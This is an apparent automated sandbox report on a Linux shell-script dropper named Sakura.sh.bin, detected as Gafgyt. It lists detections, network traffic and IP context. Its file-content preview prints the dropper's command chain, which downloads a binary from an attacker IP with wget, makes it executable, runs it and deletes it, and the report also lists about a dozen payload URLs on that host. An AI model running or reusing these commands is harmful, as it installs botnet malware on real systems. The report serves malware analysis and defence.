Edit tour

Linux Analysis Report
Sakura.sh.bin

Overview

General Information

Sample name:	Sakura.sh.bin
Analysis ID:	1641762
MD5:	57f1041fd8cdcbb4c369bb68bfd99db8
SHA1:	15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256:	6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
Infos:

Detection

Score:	64
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected ShellDownloader

Executes the "wget" command typically used for HTTP/S downloading

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1641762
Start date and time:	2025-03-18 13:45:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Run name:	Potential for more IOCs and behavior
Analysis Mode:	default
Sample name:	Sakura.sh.bin
Detection:	MAL
Classification:	mal64.troj.linBIN@0/0@0/0

Warnings

VT rate limit hit for: http://45.135.194.28/a-r.m-4.Sakura;
VT rate limit hit for: http://45.135.194.28/a-r.m-7.Sakura;
VT rate limit hit for: http://45.135.194.28/m-6.8-k.Sakura;
VT rate limit hit for: http://45.135.194.28/m-i.p-s.Sakura
VT rate limit hit for: http://45.135.194.28/m-i.p-s.Sakura;
VT rate limit hit for: http://45.135.194.28/m-p.s-l.Sakura;
VT rate limit hit for: http://45.135.194.28/p-p.c-.Sakura;
VT rate limit hit for: http://45.135.194.28/x-3.2-.Sakura;

Runtime Messages

Command:	bash "/tmp/Sakura.sh.bin"
PID:	6213
Exit Code:
Exit Code Info:
Killed:	True
Standard Output:
Standard Error:	--2025-03-18 07:45:43-- http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:45:46-- (try: 2) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:45:50-- (try: 3) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:45:54-- (try: 4) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:46:00-- (try: 5) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:46:07-- (try: 6) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:46:14-- (try: 7) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying. --2025-03-18 07:46:23-- (try: 8) http://45.135.194.28/m-i.p-s.Sakura Connecting to 45.135.194.28:80... connected. HTTP request sent, awaiting response... No data received. Retrying.

Process Tree

system is lnxubuntu20

bash (PID: 6213, Parent: 6126, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /usr/bin/bash /tmp/Sakura.sh.bin

bash New Fork (PID: 6214, Parent: 6213)

wget (PID: 6214, Parent: 6213, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://45.135.194.28/m-i.p-s.Sakura

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Sakura.sh.bin	JoeSecurity_ShellDownloader	Yara detected ShellDownloader	Joe Security

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

• AV Detection
• Networking
• System Summary
• Persistence and Installation Behavior
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Sakura.sh.bin

Avira: detected

Multi AV Scanner detection for submitted file

Source: Sakura.sh.bin	Virustotal: Detection: 64%			Perma Link
Source: Sakura.sh.bin	ReversingLabs: Detection: 70%

Source: /usr/bin/bash (PID: 6214)

Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.Sakura

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28
Source: unknown	TCP traffic detected without corresponding DNS query: 45.135.194.28

Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.20.3 (linux-gnu)Accept: /Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive

Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-4.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-5.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-6.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/a-r.m-7.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/i-5.8-6.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/m-6.8-k.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/m-i.p-s.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/m-p.s-l.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/p-p.c-.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/s-h.4-.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/x-3.2-.Sakura;
Source: Sakura.sh.bin	String found in binary or memory: http://45.135.194.28/x-8.6-.Sakura;

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Yara detected ShellDownloader

Source: Yara match

File source: Sakura.sh.bin, type: SAMPLE

Source: classification engine

Classification label: mal64.troj.linBIN@0/0@0/0

Source: /usr/bin/bash (PID: 6214)

Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.Sakura

Jump to behavior

Source: /usr/bin/bash (PID: 6213)

Queries kernel information via 'uname':

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	12 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Sakura.sh.bin	65%	Virustotal		Browse
Sakura.sh.bin	71%	ReversingLabs	Win32.Trojan.Gafgyt
Sakura.sh.bin	100%	Avira	LINUX/Dldr.Agent.hlw

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.135.194.28/m-i.p-s.Sakura	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://45.135.194.28/p-p.c-.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/m-p.s-l.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-7.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/x-3.2-.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/m-i.p-s.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/m-6.8-k.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-4.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-5.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/s-h.4-.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/a-r.m-6.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/i-5.8-6.Sakura;	Sakura.sh.bin	false	unknown
http://45.135.194.28/x-8.6-.Sakura;	Sakura.sh.bin	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.135.194.28	unknown	Germany	213030	SKYLINKCZ	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
91.189.91.43	GwRba1mTFR.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
91.189.91.42	GwRba1mTFR.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	https://paste.ubuntu.com/p/2xjw98FbQJ	Get hash	malicious	Unknown	Browse	185.125.188.23
	2gkeFl1jcj.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	GwRba1mTFR.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
CANONICAL-ASGB	https://paste.ubuntu.com/p/2xjw98FbQJ	Get hash	malicious	Unknown	Browse	185.125.188.23
	2gkeFl1jcj.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	GwRba1mTFR.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
	na.elf	Get hash	malicious	Prometei	Browse	91.189.91.42
INIT7CH	GwRba1mTFR.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
	na.elf	Get hash	malicious	Prometei	Browse	109.202.202.202
SKYLINKCZ	na.elf	Get hash	malicious	Prometei	Browse	45.135.194.29
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	45.135.194.29
	networkrip.mips.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.armv7l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.arm4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.ppc.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.arm5.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61
	networkrip.mpsl.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.135.194.61

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	Bourne-Again shell script, ASCII text executable
Entropy (8bit):	4.687336061912351
TrID:	Linux/UNIX shell script (7007/1) 100.00%
File name:	Sakura.sh.bin
File size:	2'098 bytes
MD5:	57f1041fd8cdcbb4c369bb68bfd99db8
SHA1:	15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256:	6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
SHA512:	fe018d3aa481c685d6e6b30c982050d33f8901dbe5054ed2d0fa8035353441731fc9255345c454e505492ea075936350bdb33303cdc2d83df2f9f55b80665a56
SSDEEP:	48:vWd8jhttQdMwYnRV7WT68CwIDL1B5NwITxST:vWd8jhttQdMwYnRV7WT68CwIDBB5NwIw
TLSH:	BD412BD7119247F32C90DC3772698480F6D4919A9AC6AF4ABEDC3CE448BEDEC7444683
File Content Preview:	#!/bin/bash.cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://45.135.194.28/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura.cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://45.135.194.28/

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 77
• 443 (HTTPS)
• 80 (HTTP)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 18, 2025 13:45:44.261095047 CET	49484	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:44.268249035 CET	80	49484	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:44.268352985 CET	49484	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:44.270634890 CET	49484	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:44.278184891 CET	80	49484	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:45.931258917 CET	80	49484	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:45.933849096 CET	49484	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:45.939425945 CET	80	49484	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:45.943042994 CET	42836	443	192.168.2.23	91.189.91.43
Mar 18, 2025 13:45:46.940417051 CET	49486	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:46.945281982 CET	80	49486	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:46.945382118 CET	49486	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:46.947782993 CET	49486	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:46.952522039 CET	80	49486	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:47.734869003 CET	42516	80	192.168.2.23	109.202.202.202
Mar 18, 2025 13:45:48.607059956 CET	80	49486	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:48.609559059 CET	49486	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:48.614316940 CET	80	49486	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:50.615875006 CET	49488	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:50.621520996 CET	80	49488	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:50.621597052 CET	49488	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:50.623742104 CET	49488	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:50.629209042 CET	80	49488	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:52.279788971 CET	80	49488	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:52.282191992 CET	49488	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:52.283001900 CET	49488	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:52.288599014 CET	80	49488	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:55.289772034 CET	49490	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:55.294534922 CET	80	49490	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:55.294662952 CET	49490	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:55.296960115 CET	49490	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:55.301661968 CET	80	49490	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:56.935837030 CET	80	49490	45.135.194.28	192.168.2.23
Mar 18, 2025 13:45:56.937453032 CET	49490	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:56.938082933 CET	49490	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:45:56.942811012 CET	80	49490	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:00.533027887 CET	43928	443	192.168.2.23	91.189.91.42
Mar 18, 2025 13:46:00.943634033 CET	49492	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:00.948394060 CET	80	49492	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:00.948546886 CET	49492	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:00.951803923 CET	49492	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:00.956476927 CET	80	49492	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:02.611524105 CET	80	49492	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:02.612665892 CET	49492	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:02.613991976 CET	49492	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:02.618623972 CET	80	49492	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:07.621417999 CET	49494	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:07.626197100 CET	80	49494	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:07.626410007 CET	49494	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:07.629508972 CET	49494	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:07.634180069 CET	80	49494	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:09.265435934 CET	80	49494	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:09.267772913 CET	49494	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:09.269216061 CET	49494	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:09.273874998 CET	80	49494	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:12.819417000 CET	42836	443	192.168.2.23	91.189.91.43
Mar 18, 2025 13:46:15.274492025 CET	49496	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:15.279438972 CET	80	49496	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:15.279526949 CET	49496	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:15.281068087 CET	49496	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:15.285765886 CET	80	49496	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:16.902945042 CET	80	49496	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:16.905426025 CET	49496	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:16.910130024 CET	80	49496	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:18.962558031 CET	42516	80	192.168.2.23	109.202.202.202
Mar 18, 2025 13:46:23.910670996 CET	49498	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:23.915533066 CET	80	49498	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:23.915684938 CET	49498	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:23.917514086 CET	49498	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:23.922199965 CET	80	49498	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:25.546727896 CET	80	49498	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:25.549228907 CET	49498	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:25.555023909 CET	80	49498	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:33.554141998 CET	49500	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:33.560338020 CET	80	49500	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:33.560448885 CET	49500	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:33.562036037 CET	49500	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:33.567631006 CET	80	49500	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:35.200393915 CET	80	49500	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:35.202505112 CET	49500	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:35.208101034 CET	80	49500	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:41.487507105 CET	43928	443	192.168.2.23	91.189.91.42
Mar 18, 2025 13:46:44.209086895 CET	49502	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:44.213850975 CET	80	49502	45.135.194.28	192.168.2.23
Mar 18, 2025 13:46:44.213948965 CET	49502	80	192.168.2.23	45.135.194.28
Mar 18, 2025 13:46:44.217370987 CET	49502	80	192.168.2.23	45.135.194.28
